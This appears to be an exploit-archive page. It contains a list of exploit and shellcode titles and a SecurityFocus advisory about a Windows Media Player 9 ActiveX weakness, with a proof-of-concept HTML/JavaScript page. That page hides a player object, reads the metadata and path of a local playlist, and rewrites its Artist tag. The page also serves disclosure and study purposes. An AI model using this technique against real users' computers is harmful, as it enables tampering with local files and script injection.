880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
56 lines
No EOL
2.4 KiB
HTML
56 lines
No EOL
2.4 KiB
HTML
source: https://www.securityfocus.com/bid/12031/info
|
|
|
|
The Windows Media Player ActiveX control is prone to a security weakness. The issue is that the control may be abused by a Web page to change attributes of media files (such as MP3). An attacker can influence attributes such as the artist, song name, or album name.
|
|
|
|
It is possible to exploit this weakness to inject malicious script code into these attributes. If this issue was combined with a vulnerability that could force Internet Explorer to interpret the injected script code, it may be possible to execute malicious script code in the Local Zone. Such an attack would lead to execution of arbitrary code on computers that do not have this Zone locked down.
|
|
|
|
This issue is reported to affect Windows Media Player 9. It reportedly does not work on computers running Windows XP SP2 when the attack is executed from a remote source. This is likely due to additional browser security measures in Windows XP SP2.
|
|
|
|
<object style="display:none;"
|
|
classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6"
|
|
id="WindowsMediaPlayer">
|
|
<param name="autoStart" value="1">
|
|
<param name="url" value="file://c:\program files\winamp\winamp.m3u">
|
|
<param name="mute" value="1">
|
|
</object>
|
|
|
|
<script>
|
|
|
|
note = 'Look at yourself and find the mortality of your body';
|
|
|
|
setTimeout(
|
|
function(){
|
|
if (WindowsMediaPlayer.currentMedia.sourceURL!='c:\\program files\\winamp\\winamp.m3u')
|
|
{
|
|
artist = WindowsMediaPlayer.currentMedia.getItemInfo("Artist");
|
|
title = WindowsMediaPlayer.currentMedia.getItemInfo("Title");
|
|
album = WindowsMediaPlayer.currentMedia.getItemInfo("Album");
|
|
texxt = "";
|
|
if (artist!=note)
|
|
{
|
|
if (artist!="")
|
|
texxt='I like '+artist+'!\n';
|
|
if (title!="")
|
|
texxt=texxt+'I think '+title+' is the best song';
|
|
if ((title!="")&&(album!=""))
|
|
texxt=texxt+' from ';
|
|
if (album!="")
|
|
texxt=texxt+'My favorite album "'+album+'".\n';
|
|
else
|
|
texxt=texxt+'.\n';
|
|
texxt=texxt+'I have it on my computer ('+WindowsMediaPlayer.currentMedia.sourceURL+'), I guess you have it too! ;)';
|
|
alert(texxt);
|
|
}
|
|
WindowsMediaPlayer.currentMedia.setItemInfo("Artist",note);
|
|
alert('done!\nplay '+WindowsMediaPlayer.currentMedia.sourceURL+' by a player and take a look at artist name, it must be changed!');
|
|
WindowsMediaPlayer.controls.stop();
|
|
WindowsMediaPlayer.controls.play();
|
|
}
|
|
else
|
|
alert('Can\'t find winamp default playlist!\nMost probably the winamp is not installed in c:\\program files\\winamp directory.');
|
|
}
|
|
,2000);
|
|
</script>
|
|
|
|
|
|
</body></html> |